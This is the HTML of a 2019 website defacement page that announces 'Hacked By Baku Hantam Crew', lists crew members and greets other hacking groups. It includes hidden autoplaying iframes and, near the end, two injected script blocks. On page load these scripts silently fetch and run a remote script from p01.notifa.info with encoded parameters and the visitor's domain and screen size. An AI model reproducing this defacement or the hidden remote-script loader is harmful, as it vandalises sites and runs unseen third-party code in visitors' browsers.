



<HTML><iframe width="0" height="0" src="https://5.top4top.net/m_1285ov3ca0.mp3" frameborder="0" allowfullscreen></iframe>
<TITLE>Hacked By Baku Hantam Crew</TITLE>
<BODY BGCOLOR="BLACK"><CENTER>
</BR></BR></BR><FONT FACE="Courier New" COLOR="WHITE">3
<IMG SRC="https://wallpapercave.com/wp/IvvmcJh.jpg"><P>
<H3>+- Hacked By <font color="white">Baku Hantam Crew <font color="white">-+ <font color="white"><br>@2019
<PRE><font color="white">" Hari ini sungguh tidak ada yang menyenangkan,<br>Semua nya tampak mengecewakan saja. "
<font color="white">
We are: 
<font color="
red">Naskleng45<font color="white"> - UnM@SK - PikunPe0ple - 4LM05TH3V!L - Corpz92 - 1ND0TR0J4N X - Mr.ARI4ANDA<br><br>Greet to:
N45HT - Hidden Ghost Team - Sorong6etar - IndoXploit - D704T - Garuda Tersakti72
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2%2fR6QOY1HP3IfeTNa8L%2fgg74Tw%2frW5QgyX4XtB%2bIohcD7TWYgv3%2fFxzAp10FMxEnprVnkrpVGPSBdoM%2bqhQSk9JxtoCWkzNKFmfH2u4w2v%2bsvli3aP%2fNaDIha6gjScMdkELCxxWYniYDpL5sGbM5ie%2bdwhqjfLrRr0ROt4MTSOTvcTF54RSBgLa4XuWGZBYoUZ8FtQ%2f5MqXU7ZXMS2Lhbc9OYH5jn%2fz4QamtkZ1pojtuwqj%2b%2bIcHHGrSWQ%2f4g1L50jN5ai%2fGKGZG%2fzZ5VJ5BG8CejD8c15KXRSn0LNDCIn2svSH2phJFAo4gG4Eop%2b0SlSeQzrgrNbqDiIL7esb3CZ2akDLj3Xrj0BnDVMYuqVCp%2brbLZZO3ZeW6BxzDVWDtVB4m5J%2bQqojU4bmuWLljHDgloBAksru9ULMiUCSLVTQOiTxQOUR9fiqAPzlvxh4no3OFYhI84RPOSXOCLQPH%2f%2b7dikWufDuFIpEqpnCGyKhpdB8G3C6f%2bofR%2bQF%2fG5ocjGHLGc2Z5CIcOwZCzd%2bnM44Zgo1bxP51YluigYNCF19%2bcPE5gqwPeZUk771tC%2frX1" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2r9BW1Dfe0J2dIuozS1ZljkBuNYXooKIBGYMTnM0Js66vosLiioHnBFZF7KmH642nAzHOBYbmGbKdG7MyKIgWyZEVkD7cXTiB%2bB3ntjS9eHm5r5V09oK9BganEhb84j62cM8OmAIDtVKi497IXjdeaDxTQIE2rwm%2b%2fA0zNxgNF%2fj6UOdgdDb5%2bEd5g284leyuX1DGLXAE746Q3kv0zbSZq9cMobubJ6HyG3XVpALY3d11q3YeloaW17OEbFepmnVghLj8Bhsf89QUXszor%2fD%2f4sQctQ%2bkPT%2bkkS5TzI2pR3FdsByG9UJkiC0%2f0WGikXK2PP%2fJwkEh8DxKH3k5iT3x7moHNpIq4gFzurr6xUjT1XM7LctQKusHMLCe5MQhr2Es%2baiFJCH6WdYj8XLzRu2T7cOXvXH5%2fqOi6RV3BpeTFJaETRdKTyDJlX09lO3lXmZBTjU2JgHD0hK6P3ASSvHkvFTj02Q7eODIeqWEpKe1qQtuZblZpxY6xzG4CKEodvUdx3x230lwoBNVj%2fhyE4xqboizvHZLU9c8r6dG%2f21WmyEJFhD%2fSsYTyw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></BODY>
<iframe width="0%" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/113171370&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true&visual=true"></iframe>
</HTML>